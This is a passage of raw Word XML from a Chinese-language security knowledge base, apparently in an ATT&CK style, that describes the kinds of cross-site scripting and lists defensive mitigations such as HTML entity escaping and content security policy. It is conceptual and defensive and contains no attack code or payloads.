          <w:p w14:paraId="6AA7F58D" w14:textId="77777777" w:rsidR="00624164" w:rsidRPr="005C4554" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="48841430" w14:textId="77777777" w:rsidR="00624164" w:rsidRPr="005C4554" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624164" w:rsidRPr="00671A0D" w14:paraId="4ECE6C94" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0E763B" w14:textId="0D356705" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分离数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04DA8935" w14:textId="2F543EEF" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序逻辑中分离数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624164" w:rsidRPr="00671A0D" w14:paraId="09444BF6" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="602837B0" w14:textId="6CA1F153" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>隐藏设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01ED578C" w14:textId="46BA1AC6" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在成功注入攻击的情况下限制数据暴露的设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624164" w:rsidRPr="00671A0D" w14:paraId="4E90EDB3" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C22D564" w14:textId="16A7A2F2" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F613090" w14:textId="0CF8C626" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期扫描面向外部的系统是否存在漏洞，通过扫描和公开披露发现关键漏洞快速修补系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624164" w:rsidRPr="00671A0D" w14:paraId="0C79AB46" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28FBC51E" w14:textId="48E3C5A6" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发安全要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DC5E89D" w14:textId="69077D8D" w:rsidR="00624164" w:rsidRPr="00671A0D" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发人员在设计和编写软件时有安全要求。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD6EE29" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164"/>
    <w:p w14:paraId="04ACD854" w14:textId="5061FED0" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="006003E3" w14:paraId="1203F5A9" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F3BE18" w14:textId="3540A62D" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC3BA50" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D085AC" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A4E124" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="345DEAC2" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CF41E6D" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E51BDA" w14:textId="53C3C44A" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3">
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站点脚本（以下简称</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是一种代码注入攻击，黑客将恶意脚本注入目标网站，以便用户在浏览器中运行目标网站时，可以获取敏感的用户信息，如</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123C6F6" w14:textId="184E3B6E" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3">
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况是恶意代码与普通代码混合在一起而未经过验证。浏览器不知道哪些脚本可以信任，因此可能允许运行恶意脚本。由于最终用户直接执行，恶意代码可以根据获取的用户信息轻松获取用户信息或发起黑客定义的虚假用户请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B476E" w14:textId="77777777" w:rsidR="006003E3" w:rsidRDefault="006003E3" w:rsidP="006003E3">
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据攻击来源，</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可分为三类：存储</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，反射</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和基于</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。前两个类别属于基于服务器的安全漏洞，而基于</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安全漏洞，因为恶意代码在浏览器中被检索和运行。存储</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和反射</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的区别在于放置恶意代码的位置</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储的</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将恶意代码放入数据库，而</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其放入</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006003E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA4C00" w14:textId="1F33ECDE" w:rsidR="006003E3" w:rsidRPr="006003E3" w:rsidRDefault="006003E3" w:rsidP="001C4867">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="006003E3" w:rsidRPr="005C4554" w14:paraId="766A8138" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7E9EE822" w14:textId="77777777" w:rsidR="006003E3" w:rsidRPr="005C4554" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="313C6E91" w14:textId="77777777" w:rsidR="006003E3" w:rsidRPr="005C4554" w:rsidRDefault="006003E3" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006003E3" w:rsidRPr="00671A0D" w14:paraId="2453F6DB" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEC4BA9" w14:textId="2436FF1A" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="006003E3" w:rsidP="006003E3">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>前段渲染</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A1F7838" w14:textId="5C49FD92" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="006003E3" w:rsidP="006003E3">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>前端渲染用于分隔代码和数据，以便可以防止存储的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和反射的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006003E3" w:rsidRPr="00671A0D" w14:paraId="542124D0" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4431E26F" w14:textId="0CA9C1C6" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="006003E3" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实体转义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C8A2FA" w14:textId="3678D529" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7BCC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实现完全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实体转义以完成转义策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006003E3" w:rsidRPr="00671A0D" w14:paraId="7831A915" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="168E3128" w14:textId="168529D9" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7BCC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容安全政策（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CSP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E80DF4" w14:textId="77777777" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>严格的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CSP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用于防止：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645F409E" w14:textId="77777777" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="ItemListinTable"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从外部域加载代码以远离复杂的攻击逻辑</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2245E5" w14:textId="77777777" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="ItemListinTable"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从外部域提交以避免网站攻击中的数据泄漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2194BFC1" w14:textId="77777777" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="ItemListinTable"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行内联脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6635F3" w14:textId="1335761F" w:rsidR="00FA7BCC" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="ItemListinTable"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行未经授权的脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68008D17" w14:textId="7B309E4A" w:rsidR="006003E3" w:rsidRPr="00671A0D" w:rsidRDefault="00FA7BCC" w:rsidP="00FA7BCC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报告功能可用于及时识别</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并尽快解决问题。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
